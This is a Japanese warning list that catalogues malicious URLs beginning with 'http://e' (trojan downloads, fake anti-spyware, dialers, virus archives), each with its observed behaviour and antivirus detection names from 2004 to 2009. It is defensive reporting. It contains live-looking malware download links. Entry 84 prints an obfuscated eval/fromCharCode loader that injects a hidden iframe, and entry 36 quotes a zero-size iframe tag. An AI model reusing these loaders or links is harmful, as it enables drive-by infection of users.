Kiken URL List
http:// e から始まるURL

このページは危険と思われるURLでhttp:// e から始まるURLを掲載しています。
他のサイトからこのページに来られた方は最初に Kiken URL List のトップページ をよく読んでください。


Kiken URL List の見方

通し番号.URL( 数字→アルファベット順 )
[確認日/掲載日] 鑑定結果/解説
  ← このようになっています。

  1. http://e.rn11.com/a/a369-ovc720spi
    [2005/07/19]踏むと こんな感じの画面 。画面の左上のほうの濃い青の部分全体がリンクになっている。
    濃い青の部分も含めて画面全体の何処を右クリックしても これ を表示。
    濃い青の部分をクリックすると、下のURLに飛び、「SpySpotterWebInstall.exe」なるexeのDLを促してくる。フルスクリーンでの実行も促してくる。
    //e.spyspotter.com/landings/lp238-9723?a=369&r=428&c=5039
    googleで検索すると、それ自身がスパイウェアと呼べるような、いわゆるインチキスパイウエア対策ソフトらしい。


  2. http://e.rn11.com/adbuys/a783-oversee_720x300_jpn
    [2005/12/19]踏むと こんな感じ 。画面のどこを右クリックしても これ が出る。
    「O.K.」をクリックしてください…云々と書いてあるが、文章や「OK」ボタン周辺がリンクになっている。リンクを踏むと こんな感じ( @ ) のページを新窓表示して、ダイアログを表示、それを拒否すると こんな感じ( A ) のページを表示して「pyspotterwebinstall.exe」なるアプリケーションをDLしろ、と言ってくる。
    A を閉じると こんな感じ( B ) のページを新窓表示して、ダイアログを表示、それを拒否すると「pyspotterwebinstall.exe」をDLしろ、と言ってくる。B は普通に閉じれる。「pyspotterwebinstall.exe」は C のURLである。
    このexeが有害であるかどうかは不明だが、スパイウェア駆除ソフトを装ったスパイウェアの可能性がある。番号は以下のURLである。
    @ → //e.spyspotter.com/landings/lp593-12230?a=783&r=1179&c=7996
    A → //c.spyspotter.com/landings/593-12230/alt_download_REG.html?783-1179-7996-593
    B → //c.spyspotter.com/landings/593-12230/landing2_REG.html?783-1179-7996-593
    C → //download.spyspotter.com/spyspotter/sp3.02r/spyspotterwebinstall.exe
    [2005/12/19]他の方の結果は以下の「」内。
    「スパイウェア対策サイトらしいですが、怪しすぎます。進むとexeファイルを落とそうとしてきます。」
    [2005/12/20]「あなたのコンピューターがスパイウェアのダメージを…と脅して、スキャンの実行を促しつつ、何やら怪しげなexeを実行させようとします。」


  3. http://eagledawg09.emediaspot.com/KT/index.html
    [2004/11/24] 洋ロリサイトでSPYBOTが反応し、ノートンがTrojan Horseを検出するらしい。
    バスターでは反応無しだがHDDが唸りだし、暫くしてIEが落ちる。


  4. http://eahahf.cn/a01/real.htm
    [2009/01/15]真っ白なページだが、ウィルス名:JS_REAPLAY.B を検出。


  5. http://earth.prohosting.com/cyuch/
    [2004/04/29] 無限JavaScript。mailtoストーム。ブラクラチェッカーの診断結果:JS_NIMDA.A(PE_NIMDA.Aの可能性)
    [2004/06/02]色んなブラクラサイトに新規ウィンドウでアクセスされる。
    [2004/08/26]現在は//masaton1192.tripod.com/を呼ぶ。


  6. http://eastcoaststorageequipment.com/installer.exe
    [2008/08/20]2008/08/19 にDLしたファイルには、ウィルス名:TROJ_NUWAR.GXZ を検出。
    しかし、今日改めて当該URLを調べてみると 404 になっていた。


  7. http://easyweb.easynet.co.uk/~hiros/virii99/idyll.zip
    [2004/07/31]ウィルス名:PE_IDYLL_WILD


  8. http://easyweb.easynet.co.uk/~hiros/virii99/Mix/today.zip
    [2004/07/31]ウィルス名:W97M_CLASS.BH


  9. http://easyweb.easynet.co.uk/~hiros/virii99/newtype/Happy99.exe
    [2004/07/31]ウィルス名:WORM_SKA.A
    [2005/09/04]再確認。Forbiddenになっている。


  10. http://easyweb.easynet.co.uk/~hiros/virii99/newtype/list.zip
    [2004/07/31]ウィルス名:W97M_MELISSA.A


  11. http://easyweb.easynet.co.uk/~hiros/virii99/newtype/LOVE.zip
    [2004/07/31]ウィルス名:VBS_LOVELETTER-O


  12. http://easyweb.easynet.co.uk/~hiros/virii99/newtype/wincih.zip
    [2004/06/06]ウィルス関連と思われる英語テキストファイルでファイルそのものにウィルスは無い[ 安全 ]


  13. http://easyweb.easynet.co.uk/~hiros/virii99/Normal/padania.zip
    [2004/07/31]ウィルス名:PE_PADANIA


  14. http://easyweb.easynet.co.uk/~hiros/virii99/Not/asciiv.zip
    [2004/07/31]ウィルス名:ASCIIV.613-O


  15. http://easyweb.easynet.co.uk/~hiros/virii99/Not/dodgy.zip
    [2004/07/31]ウィルス名:DOGGY*


  16. http://easyweb.easynet.co.uk/~hiros/virii99/Not/urkel.zip
    [2004/07/31]ウィルス名:URKEL*


  17. http://easyweb.easynet.co.uk/~hiros/virii99/Packed/winvirii98.zip
    [2004/07/31] ウィルスの詰め合わせ。
    ウィルス名:EXE2WIN.133-E+HTTM.241+ANT633+EXE2WIN.132-E+EXE2WIN.214-E+WIN.1241+DATAMLST-1+WINVIR14


  18. http://easyweb.easynet.co.uk/~hiros/virii00/METALLICA_SONG.MP3
    [2004/09/11]ウィルス名:PE_Mtx.A


  19. http://ebiz.xxx-access.com/show.php?|||3twnjsyfqgnyhm3sjy4s8y4f{6:3myrqI-|-Iasian
    [2005/05/08]「99bb月額見放題」という日本語アダルトサイトだが、ウィルス名:HTML_REDIR.Aを検出。


  20. http://ebogiatto.com/resume.exe
    [2008/08/19]ウィルス名:TSC_GENCLEAN+TROJ_SRIZBI.L


  21. http://edge.s57.xrea.com/files/asylum.zip
    [2005/02/03]exeファイル3つ入っているが全てウィルス。詳細は以下。
    client.exe ←ウィルス名:Backdoor.Trojan.Client [ノートン] 、BKDR_ASYLUM.013 [ウィルスバスター]
    config.exe ←ウィルス名:W32.Slackoe.dr [ノートン] 、TROJ_YABINDER.20 [ウィルスバスター]
    server.exe ←ウィルス名:Backdoor.Asylun [ノートン]、BKDR_ASYLUM [ウィルスバスター]
    [2005/02/06]トロイの木馬というハッキングツールの一種。 アンチウィルスソフトは反応するがserver.exe以外はPC無害らしい。


  22. http://edge.s57.xrea.com/files/filt.exe
    [2005/01/24]ウイルス名:Backdoor.NetDevil[ノートン]。バスターは無反応。
    オンラインファイルスキャンに掛けるとウィルス名:Backdoor.Win32.Bifrose.dを検出。
    ハッカーが感染先のコンピュータを遠隔操作できるようにするバックドアトロイの木馬らしい。


  23. http://edoya.dyndns.org/cgi-bin/-_-/gw.cgi/nekodaisuki[5桁数字].jpg
    [2004/02/18] //ime.nu/や//pinktower.com/経由はブラクラ。
    Refererでブラクラに飛ばすかどうか決めているらしい。
    [2004/08/18] リファをチェックするCGIが動いている。
    リファがある=ime.nuや他の転送URLからきた物=2chに直リンクされたものはブラクラにリダイレクト。
    直接打ちだと画像が表示される。


  24. http://ejams.com/chat/atualizacao.exe
    [2009/03/23]ファイルサイズ:1.17 MB 。ウィルス名:TROJ_DLOADER.SGW


  25. http://ejams.com/chat/atualizacao.php
    [2009/03/23]以下のファイルが落ちてくる。このファイルからウィルス名:TROJ_DLOADER.SGW を検出。
    //ejams.com/chat/atualizacao.exe


  26. http://el-killer.chez-alice.fr/Virii.htm
    [2008/07/29]こんな感じ のサイト。怪しい音楽付きである。
    ウィルスやスパイウェアがDL出来るらしいが、未確認。
    悪用厳禁であることには間違いないが、大抵のウィルスファイルには各社ウィルス駆除ソフトで対応済みであろうと思われる。
    しかし、実際に対応してるかどうかは確認していないので要注意。
    [2008/07/29]他の方の結果では、
    「chez-alice.fr」というタイトルの主にウイルスなどを紹介・DLできる怪しい外国サイトでした。
    音量が出るので一応注意、当環境ではそこまで Kaspersky 無反応ですがマカフィーアドバイザーでアドウェア、スパイウェア、ウイルスとの判定が出ているので踏まない方がいいでしょう。


  27. http://eledentransex.com/index1.html
    [2008/08/19]こんな感じ のサイト。以下の @ のファイルをDLしろ、と言ってくる。
    少し経って、ActiveX 実行の要求もしてきて、ウィルス名:JS_PSYME.CJA を検出。
    @、//eledentransex.com/get_flash_update.exe


  28. http://eledentransex.com/get_flash_update.exe
    [2008/08/19]ウィルス名:TSC_GENCLEAN+TROJ_RENOS.AFT


  29. http://eledentransex.com/metai.html
    [2008/08/19]8秒後に //eledentransex.com/index1.html に飛ぶので、そちらのURL List解説を参照。


  30. http://elobservadorag.com.ar/stream.exe
    [2008/08/27]ウィルス名:TSC_GENCLEAN+TROJ_FAKEAV.FP


  31. http://elogios0.myartsonline.com/cartao1152uol/emocoes/validasessao0k/temaagradecimento/Video_legal.com
    [2008/12/04]「Video_legal.com」という名前のMS-DOSアプリケーションファイルが落ちてくるが、ウィルス名:CRYP_MANGLED を検出。


  32. http://elpatiodejesusmaria.com/cnncurrent.html
    [2008/08/20]こんな感じ のサイトだが、ウィルス名:TSC_GENCLEAN+HTML_AGENT.AVYZ を検出。
    ソースを見ると、ほとんどがコード変換されていて、読みにくいよう工夫されている。その中に以下のURLが隠れている。
    //elpatiodejesusmaria.com/adobe_flash.exe ← ウィルス名:TSC_GENCLEAN+TROJ_EXCHANGE.Y


  33. http://elpatiodejesusmaria.com/adobe_flash.exe
    [2008/08/20]ウィルス名:TSC_GENCLEAN+TROJ_EXCHANGE.Y


  34. http://elportal.info/vid.exe
    [2008/08/27]ウィルス名:TSC_GENCLEAN+TROJ_AGENT.AWRZ


  35. http://eltubio.com.ar/tvideo_my_hot.exe
    [2009/01/03]ウィルス名:TROJ_EXCHANGE.CR


  36. http://email.zzzsoft.com/
    [2005/03/06]バスター無反応だが他アンチウィルスソフトでウイルス名:PWSteal.Trojanを検出するらしい。
    ログイン名とパスワードを盗み出すトロイの木馬。サイトの内容は文字だけで詳細不明。
    [2005/03/06]踏むと こんな感じの画面 。バスター無反応。
    しかし、ソースを見ると一見綺麗なソースのように見えるが一番最後に下記↓の大文字小文字混じりの怪しいIFRAMEタグがあり、別のURLを呼び出していることが分かる。
    <iFRAmE SRc=http://www.akoak.com/mf/1.htm width=0 hEight=0></iFRAmE>
    その呼び出されたURL://www.akoak.com/mf/1.htmのKiken URL List解説も参照。


  37. http://embratelbrasil21.t35.com/relatorio_download.html
    [2007/03/06]環境により、下のexeファイルが落ちてくるが、ウィルス名:TROJ_DELF.ENL を検出。
    //embratelbrasil21.t35.com/relatorionum13856.exe
    [2008/08/20]再確認。こんな感じ のサイト。1秒後に以下のファイルをDLしろ、と言ってきてウィルス名:TSC_GENCLEAN+PAK_Generic.006 を検出。
    //embratelbrasil21.t35.com/relatorionum13856.exe


  38. http://embratelbrasil21.t35.com/relatorionum13856.exe
    [2007/03/06]2007/02/28 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:TROJ_DELF.ENL として検出するよう対応、とのこと。
    実際に 2007/02/28 にDLしたファイルと、今日改めてDLしたファイルからからウィルス名:TROJ_DELF.ENL を検出することを確認。
    2007/02/28 からきょうまではファイルの置き換えは行われていないと推測される。


  39. http://emes.com.br/avi_porn.exe
    [2008/07/20]ウィルス名:TSC_GENCLEAN+TROJ_DLOAD.CE


  40. http://emilimport.com/e-card.exe
    [2008/08/20]ウィルス名:TSC_GENCLEAN+TROJ_DROP.CF
    [2008/09/04]2008/08/21 の時点でバスター無反応。2008/08/21 にトレンドマイクロ社にその日にDLしたファイルを提出。
    2008/09/03 にその結果の連絡があり、「弊社では正常ファイルとして判断したファイルで、対応は行わない」とのこと。
    しかし、他の主なウィルス駆除ソフトでは以下のように検出するので注意だが、今日改めて当該URLを見てみると 404 になっていた。
    AVG → Dropper.Generic.AASJ
    DrWeb → Trojan.MulDrop.18428
    eTrust-Vet → Win32/Bugnraw.EN
    Ikarus → Trojan-Downloader.Delf.OAQ
    K7AntiVirus → Trojan-Downloader.Win32.Agent.ablq
    Microsoft → TrojanDropper:Win32/Srizbi.H
    NOD32v2 → Win32/TrojanDropper.Agent.NMR
    Norman → W32/Srizbi.gen3
    VBA32 → Trojan.MulDrop.18428
    ViRobot → Trojan.Win32.Downloader.468480
    VirusBuster → Trojan.DR.Rooter.I
    Webwasher-Gateway → Win32.Malware.dam


  41. http://emineacar.com/00.html
    [2008/08/20]真っ白なページだが、ウィルス名:TSC_GENCLEAN+HTML_DLOAD.DP を検出。


  42. http://emineacar.com/codecinst.exe
    [2008/08/20]ウィルス名:TSC_GENCLEAN+TROJ_ZLOB.CBG


  43. http://emineacar.com/viewmovie.html
    [2008/08/20]こんな感じ のサイトだが、ウィルス名:TSC_GENCLEAN+HTML_ZLOB.CBG+HTML_DLOAD.DP を検出。
    また、以下のファイルをDLしろ、と催促してくる。
    //emineacar.com/codecinst.exe ← ウィルス名:TSC_GENCLEAN+TROJ_ZLOB.CBG


  44. http://emporio-uk.it/my_hot_video.exe
    [2009/01/03]ウィルス名:TROJ_NUWAR.CYA


  45. http://energy-sol.com/images/video-nude-anjelia.avi.exe
    [2008/12/04]2重拡張子。ウィルス名:TROJ_AGENT.AHEF


  46. http://engracado0-0.pisem.su/engracado00.com
    [2008/07/20]ウィルス名:TSC_GENCLEAN+TROJ_DLOADER.GEN


  47. http://engracado0-0.pisem.su/engracado00xxxx.com
    [2008/07/20]ウィルス名:TSC_GENCLEAN+Possible_Virus


  48. http://engracado0-0.pisem.su/plugin.com
    [2008/07/20]ウィルス名:TSC_GENCLEAN+TROJ_DLOADER.GEN


  49. http://engracado0-0.pisem.su/se cair hospedar esse aki.rar
    [2008/07/20]解凍すると「engracado.exe」なるファイルが現れるが、バスターがトロイの木馬として即刻削除。


  50. http://enjnzdfmts.cn/f0.pdf
    [2009/08/02]ファイルサイズ:2.92 KB 。ウィルス名:TROJ_PIDIEF.ABI


  51. http://enjnzdfmts.cn/md/index.php
    [2009/08/02]真っ白なページだが、ウィルス名:JS_ECIN.A を検出。
    ソースのほとんどがコード変換されている。


  52. http://enter00.front.ru/
    [2005/01/30]ウィルス名:JS_EXCEPTION.GEN
    [2005/04/09]改めて確認。//crack-casino.front.ru/ に飛び、ウィルス名:JS_EXCEPTION.GENを検出。定期的に別窓が表示される。


  53. http://entregavirtu.t35.com/Mensagem_Terra.exe
    [2007/01/02]ウィルス名:TSPY_BANCOS.CPP


  54. http://enviofree.pochta.ru/freecads84asxuid1033428463475386165/curioso.exe
    [2007/05/10]ウィルス名:TROJ_GENERIC


  55. http://enviofree.pochta.ru/freecads84asxuid1033428463475386165/receitafederal.exe
    [2007/05/10]ウィルス名:TSPY_BANKER.FGO


  56. http://enviofree.pochta.ru/freecads84asxuid1033428463475386165/veja.exe
    [2007/05/10]ウィルス名:TROJ_GENERIC


  57. http://epbvrq.blu.livefilestore.com/y1pwfkC06pjv0E-uIrUUszw617HOn5IMX0adtN0xTx0qyVFhof8zxBeling15svqJtcKEYeTBFZ6XiEdOWU-jU_Pg/
    [2009/03/23]長い名前の圧縮ファイルが落ちてくる。解凍すると「Cobrana110309.exe」ファイルが現れるが、ウィルス名:TROJ_BANLOAD.JMA を検出。


  58. http://eposmind.com/My_foto.exe
    [2008/07/20]ウィルス名:TSC_GENCLEAN+TROJ_SRIZBI.P


  59. http://eromega.porkyhost.com/kokuu_he_rocket/index.html
    [2005/11/18]他の方の結果は以下の「」内。
    「海外アダルトサイトです。ノートン無反応ですが、何かインストールさせようとしたり、ブラウザの「戻る」を押しても別のページに飛んだり、怪しさむんむん。踏まぬが吉。」
    [2005/11/19]踏むと こんな感じ のアダルト漫画のサムネイルが並んだサイトだが、何回か確認すると稀に以下の2つのうち、どちらかを表示することがある。
    1. 日本語のアダルトアニメ系サイトを表示する。そのURLは↓。
      //www.eroxjapanz.com/anime-index.html ← 普通に閉じれる。
    2. アドレスは //eromega.porkyhost.com/kokuu_he_rocket/index.html と同じだが、アダルト系動画が4つDL出来るページを表示する。ページのキャプ画像は割愛。
      このページを表示した途端にウィルス名:TROJ_DYFUCA.Xを検出。ダイアログも表示する。それを拒否すると これ を表示。
      「OK」「キャンセル」のどちらを選んでも下のURLに飛び、「ページを表示できません」となる。
      //mt35.mtree.com/xintl/wmid_403370/cat_5/?ergs=1+302993+mt35+ddl


  60. http://eroskop.pl/index1.html
    [2006/11/09]海外アダルトサイトだが、何かをインストールしようとしてきてウィルス名:DIAL_EROSKOP.A を検出。


  61. http://eroticqueens.com/
    [2005/10/07]ウィルス名:JS_INOR.AB 。閉じるとアダルトサイトを何枚か表示。何回か確認するとランダムに表示するらしいことが分かった。
    確認した中で厄介だった症状は、閉じても閉じてもアダルトサイトがランダム的に開き続け、強制終了も効かなかった、という症状。
    その時はバスターの緊急ロックをONにして脱出。
    [2006/10/29]2006/10/22 2:55 の時点ではIFRAMEタグで以下の2つのURLを呼び出していたが、今日確認してみると、アクセス拒否であった。
    //count4all.net/adv/033/new3.php
    //bestcount.net/adv/033/new.php
    それまでの他の方の結果は以下の「」内。
    「Trojan-Downloader.JS.Inor.a 、Constructor.Perl.Msdds.b を Kaspersky で検出。」


  62. http://errorsafe.com/pages/scanner/ErrorSafeScannerInstall.cab
    [2005/09/20]DL+解凍すると以下の2つのファイルが現れる。
    UERSNetInstaller.inf ← セットアップ情報。これは無害。
    UERSNetInstaller.exe ← バスター無反応だが、Kaspersky で反応:not-a-virus:Downloader.Win32.Agent.d


  63. http://erworn.info/26/?uid=151
    [2009/08/08]こんな感じ のサイト。ウィルス名:JS_DLOADER.UGD を検出。
    閉じると これ を表示し、再び この画面 を表示する。


  64. http://es.geocities.com/graziakaoru/hi.zip
    [2004/07/31]ウィルス名:VBS_STARTPAGE.C


  65. http://es6-scripts.dlv4.com/binaries/egauth4/egauth4_1050_EN_XP.cab
    [2006/08/03]DL+解凍後の「egauth4_1050.dll」なるファイルをトレンドマイクロ社に提出。
    今日、連絡があり、ウィルス名:DIAL_EGROUP.AT として検出するよう対応とのこと。
    当該URLからファイルをDLしてウィルス名:DIAL_EGROUP.AT を検出することを確認。
    ちなみに「egauth4_1050.dll」ファイルのサイズは 196KB である。


  66. http://es6-scripts.dlv4.com/binaries/egauth4/egauth4_1051_EN_XP.cab
    [2006/08/03]DL+解凍後の「egauth4_1051.dll」なるファイルをトレンドマイクロ社に提出。
    今日、連絡があり、ウィルス名:DIAL_EGROUP.AT として検出するよう対応とのこと。
    当該URLからファイルをDLしてウィルス名:DIAL_EGROUP.AT を検出することを確認。
    ちなみに「egauth4_1051.dll」ファイルのサイズは 126KB である。


  67. http://es6-scripts.dlv4.com/binaries/egauth4/egauth4_1052_EN_XP.cab
    [2006/08/03]DL+解凍後の「egauth4_1052.dll」なるファイルをトレンドマイクロ社に提出。
    今日、連絡があり、ウィルス名:DIAL_EGROUP.AT として検出するよう対応とのこと。
    当該URLからファイルをDLしてウィルス名:DIAL_EGROUP.AT を検出することを確認。
    ちなみに「egauth4_1052.dll」ファイルのサイズは 143KB である。


  68. http://es6-scripts.dlv4.com/binaries/IA/svcia32_EN.cab
    [2006/11/29]DL+解凍すると「svcia32.dll」なるものが現れる。バスター無反応だが、以下のアンチウィルスソフトで反応。
    Avast → Win32:Pcclient-BO
    eSafe → suspicious Trojan/Worm
    NOD32v2 → probably a variant of Win32/Dialer.Egroup
    Norman → W32/AOLTroj.BX
    2006/11/12 にトレンドマイクロ社に「svcia32.dll」ファイルを提出。
    2006/11/15 にその結果の連絡があり、「不正なコードは含まれておりません」 とのこと。


  69. http://es6-scripts.dlv4.com/exe/stream.php?icp=MSIE6.0_WIN98_1.92_JP_JA_1_1_147767_1.1.2.2.3.6_us2___MITO_VHIGH_iso-2022-jp&id_site=81&referer1=&customid=3260&dl_tracker=1-2-3&connection_type=low&asked_mdl_id=DIAL_EXE
    [2007/01/13]「Instant-Access.exe」なるファイルが落ちてくる。
    2006/11/12 にトレンドマイクロ社にファイルを提出。
    2006/11/15 にその結果の連絡があり、ウィルス名:DIAL_EGROUP.AS として検出するよう対応、とのこと。
    実際に 2006/11/12 にDLしたファイルからウィルス名:DIAL_EGROUP.AS を検出することを確認。
    しかし、2006/11/15 に改めて当該URLを調べてみるとバスター無反応。
    2006/11/12 から 2006/11/15 までの間にファイルが置き換えられたと推測される。
    2006/11/28 にトレンドマイクロ社にファイルを再提出。
    2006/12/11 にその結果の連絡があり、ウィルス名:DIAL_EGROUP.AR として検出するよう対応、とのこと。
    実際に 2006/11/28 にDLしたファイルからウィルス名:DIAL_EGROUP.AR を検出することを確認。
    しかし、今日改めて当該URLを調べてみるとバスター無反応。
    2006/11/28 から今日までの間に不定期的にファイルが置き換えられていると推測される。


  70. http://escola-allegro.com/videporn920ma.exe
    [2009/01/03]ウィルス名:TROJ_EXCHANGE.CR


  71. http://eskapada.info/video.exe
    [2009/01/03]ウィルス名:TROJ_DLOAD.DM


  72. http://estecom.co.kr/bbs/data/a/NetEmpresa.exe
    [2008/08/21]ウィルス名:TSC_GENCLEAN+Mal_Banker


  73. http://estudiscunit.com/videoQe32.exe
    [2009/01/03]ウィルス名:TROJ_DLOADER.RIP


  74. http://euqueromeusite.com.br/My_foto.exe
    [2008/10/29]ウィルス名:TROJ_SRIZBI.AF


  75. http://euwlxu.netfirms.com/
  76. http://euwlxu.netfirms.com/dream.html
    [2004/09/11]無限JavaScript。mailtoストーム。FDDアタック。


  77. http://evergreen-studio.com/play.exe
    [2008/08/27]ウィルス名:TSC_GENCLEAN+TROJ_AGENT.AWRZ


  78. http://evergreen-studio.com/player.exe
    [2008/08/27]ウィルス名:TSC_GENCLEAN+TROJ_FAKEAV.FP


  79. http://evko.biz/soft/1.exe
  80. http://evko.biz/soft/2.exe
  81. http://evko.biz/soft/3.exe
    [2006/08/17]ウィルス名:TROJ_SMALL.AXL


  82. http://ex17.2ch.net/ZZZ-news4vip/
    [2007/01/02]//ex17.2ch.net/ZZZ-news4vip/ を延々とリロードし続ける。ブラウザを閉じればそれで終わり。


  83. http://excite.sytes.net/
    [2004/08/21] 無限JavaScript。FDDアタック。ソースストーム。内容は以下らしい。
    「無限にノートパッドを開きつづける。しかもファイルの指定が全部のドライブだからフロッピーディスク&CD-Rドライブを痛めることになるかもしれない。
    はまると消すのにかなり苦労します。よくネット上でブラクラの作り方とかあるけど無限のはないはず。
    怖いのはXPだとこれを保存し,おいてあるフォルダを開きファイルを選択しただけでひっかかったりする。」


  84. http://exclusivexxxporn.com/123.html
    [2005/10/10]踏むと真っ白なページだが、少し経ってからウィルス名:JAVA_BYTEVER.A-1を検出。マカフィーでも反応するらしい。
    ソースを見ると以下のようになっている。長い行があるので、適当な箇所で改行してある。
    <html>
    <!-- Created on: 23.04.2005 -->
    <body>
    <script language=javascript>eval(String.fromCharCode(
    100,111,99,117,109,101,110,116,46,119,114,105,116,101,
    40,39,60,105,102,114,97,109,101,32,115,114,99,61,34,104,
    116,116,112,58,47,47,56,50,46,49,55,57,46,49,55,48,46,49,
    49,47,100,105,97,53,53,50,47,34,32,115,116,121,108,101,61,
    34,100,105,115,112,108,97,121,58,110,111,110,101,34,62,60,
    47,105,102,114,97,109,101,62,39,41))</script>
    </body>
    </html>

    これを復号化すると以下のようになる。//82.179.170.11/dia552/を呼んでいるのが原因。

    <html>
    <!-- Created on: 23.04.2005 -->
    <body>
    <script language=javascript>eval(String.fromCharCode(
    document.write('<iframe src="http://82.179.170.11/dia552/"
    style="display:none"></iframe>')))</script>
    </body>
    </html>
    以下は お寄せ頂いた //exclusivexxxporn.com/123.html に関する情報を記載。
    「マカフィーがウイルスを検出しました。検出されたウイルス名と場所は以下です。
    1. C:\Windows\WFV00000.TMPは、JS/Exploit-MhtReDir.Genトロイの木馬に感染していましたので、駆除を完了するために削除しました。
    2. インターネット一時ファイル。検出されたウイルス名と検出された時の処置は、1. に同じ。」


  85. http://excontrol.org/dq.exe
    [2007/04/29]2006/12/25 にトレンドマイクロ社にファイルを提出。
    2006/12/29 にその結果の連絡があり、ウィルス名:TSPY_BZUB.EC として検出するよう対応、とのこと。
    しかし、今日改めて当該URLを見てみると404であった。実際に対応したかどうかの確認はできなかった。


  86. http://excontrol.org/el/index.php
    [2006/12/24]踏むと真っ白なページでバスター無反応。
    しかし、ソースはコード変換されていて読みにくく工夫されている。何かある模様。


  87. http://exe.dialer.tintel.nl/tcw.cab
    [2006/10/27]2006/10/15 にトレンドマイクロ社にDL+解凍して現れた「Tcw.exe」ファイルを提出。
    今日、その結果の連絡があり、ウィルス名:DIAL_TINTDIAL.C として検出するよう対応、とのこと。
    実際に 2006/10/15 にDLしたファイルからウィルス名:DIAL_TINTDIAL.C を検出することを確認。
    また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_TINTDIAL.C を検出することを確認。


  88. http://exe-debug.saxodvd.com/6.exe
    [2007/03/07]2006/10/11 にトレンドマイクロ社にファイルを提出。
    2006/10/13 にその結果の連絡があり、「正常と判断したファイルで対応は行わない。」とのこと。


  89. http://exeexex.org/funny.php
    [2007/01/16]「adv_1.exe」ファイルが落ちてくる。2007/01/10 にトレンドマイクロ社に「adv_1.exe」ファイルを提出。
    今日、その結果の連絡があり、ウィルス名:TROJ_SMALL.FAO として検出するよう対応、とのこと。
    実際に 2007/01/10 にDLしたファイルからウィルス名:TROJ_SMALL.FAO を検出することを確認。
    しかし、今日改めて当該URLからDLしてみるとバスター無反応。
    2007/01/10 から今日までの間にファイルの置き換えがあったと推測される。


  90. http://exeloads.info/1.php
    [2006/12/24]ウィルス名:JAVA_BYTEVER.AQ+JAVA_BYTEVER.S
    真っ白なページだが、ソースはコード変換されていて、何かを3つ呼び出している形跡がある。


  91. http://expancia.net/images/project/.../video-nude-anjelia.avi.exe
    [2008/08/21]2重拡張子。ウィルス名:TSC_GENCLEAN+TROJ_AGENT.AHEF


  92. http://expotech.es/video.exe
    [2009/04/07]ファイルサイズ:104 KB。ウィルス名:TROJ_DLOADR.HO


  93. http://extex-events.ru/stat/load.php?id=2
    [2009/08/03]「load.exe」ファイルが落ちてくる。ファイルサイズ:32.5 KB 。このファイルからウィルス名:PAK_GENERIC.001 を検出。


  94. http://extremeaccess.info/dialers/1/AUTO_1A.exe
    [2008/07/20]ウィルス名:TSC_GENCLEAN+DIAL_PRISPARKY+PAK_Generic.001


  95. http://extremeaccess.info/dialers/1/AUTO_1N.exe
    [2008/07/20]ウィルス名:TSC_GENCLEAN+TROJ_DIALER.GD


  96. http://extremeaccess.info/dialers/2/AUTO_2A.exe
    [2008/07/20]ウィルス名:TSC_GENCLEAN+PAK_Generic.001


  97. http://extremeaccess.info/dialers/2/AUTO_2N.exe3
    [2008/07/20]ウィルス名:TSC_GENCLEAN+TROJ_DIALER.GD
    このファイルの拡張子は「 exe 」ではなく、「 exe3 」なので注意。


  98. http://extremeaccess.info/dialers/3/AUTO_3A.exe
    [2008/07/20]ウィルス名:TSC_GENCLEAN+DIAL_DIALER.PX+PAK_Generic.001


  99. http://extremeaccess.info/dialers/3/AUTO_3N.exe
    [2008/07/20]ウィルス名:TSC_GENCLEAN+TROJ_DIALER.GD


  100. http://extremeaccess.info/dialers/4/AUTO_4A.exe
    [2008/07/20]ウィルス名:TSC_GENCLEAN+PAK_Generic.001


  101. http://extremeaccess.info/dialers/4/AUTO_4N.exe
    [2008/07/20]ウィルス名:TSC_GENCLEAN+TROJ_DIALER.GD


  102. http://extremeaccess.info/dialers/77/AUTO_77A.exe
    [2008/07/20]ウィルス名:DIAL_PRISPARKY


  103. http://extremeaccess.info/dialers/77/AUTO_77N.exe
    [2008/07/20]ウィルス名:TSC_GENCLEAN+TROJ_DIALER.DB


  104. http://extremeaccess.info/dialers/81/AUTO_81A.exe
    [2008/07/20]ウィルス名:TSC_GENCLEAN+PAK_Generic.001


  105. http://extremeaccess.info/dialers/81/AUTO_81N.exe
    [2008/07/20]ウィルス名:TSC_GENCLEAN+TROJ_DIALER.DB


  106. http://extremeaccess.info/dialers/86/AUTO_86A.exe
    [2008/07/20]ウィルス名:TSC_GENCLEAN+PAK_Generic.001


  107. http://extremeaccess.info/dialers/86/AUTO_86N.exe
    [2008/07/20]ウィルス名:TSC_GENCLEAN+TROJ_DIALER.DB


  108. http://extremeaccess.info/dialers/108/AUTO_108A.exe
    [2008/07/20]ウィルス名:TSC_GENCLEAN+PAK_Generic.001


  109. http://extremeaccess.info/dialers/108/AUTO_108N.exe
    [2008/07/20]ウィルス名:TSC_GENCLEAN+TROJ_DIALER.GD


  110. http://extremeaccess.info/dialers/111/AUTO_111A.exe
    [2008/07/20]ウィルス名:TSC_GENCLEAN+PAK_Generic.001


  111. http://extremeaccess.info/dialers/111/AUTO_111N.exe
    [2008/07/20]ウィルス名:TSC_GENCLEAN+TROJ_DIALER.GD


  112. http://extremeaccess.info/dialers/118/AUTO_118A.exe
    [2008/07/20]ウィルス名:TSC_GENCLEAN+PAK_Generic.001


  113. http://extremeaccess.info/dialers/118/AUTO_118N.exe
    [2008/07/20]ウィルス名:TSC_GENCLEAN+TROJ_DIALER.GD


  114. http://extremeaccess.info/dialers/119/AUTO_119A.exe
    [2008/07/20]ウィルス名:TSC_GENCLEAN+PAK_Generic.001


  115. http://extremeaccess.info/dialers/119/AUTO_119N.exe
    [2008/07/20]ウィルス名:TSC_GENCLEAN+TROJ_DIALER.GD


  116. http://extremeaccess.info/dialers/120/AUTO_120A.exe
    [2008/07/20]ウィルス名:TSC_GENCLEAN+PAK_Generic.001


  117. http://extremeaccess.info/dialers/120/AUTO_120N.exe
    [2008/07/20]ウィルス名:TSC_GENCLEAN+TROJ_DIALER.GD


  118. http://extremeaccess.info/dialers/122/AUTO_122A.exe
    [2008/07/20]ウィルス名:TSC_GENCLEAN+PAK_Generic.001


  119. http://extremeaccess.info/dialers/122/AUTO_122N.exe
    [2008/07/20]ウィルス名:TSC_GENCLEAN+TROJ_DIALER.GD


  120. http://extremeaccess.info/dialers/127/AUTO_127A.exe
    [2008/07/20]ウィルス名:TSC_GENCLEAN+PAK_Generic.001


  121. http://extremeaccess.info/dialers/127/AUTO_127N.exe
    [2008/07/20]ウィルス名:TSC_GENCLEAN+TROJ_DIALER.GD


  122. http://extremeaccess.info/ware/tetra120307.exe
    [2008/07/20]ウィルス名:TSC_GENCLEAN+TROJ_DIALER.ZF


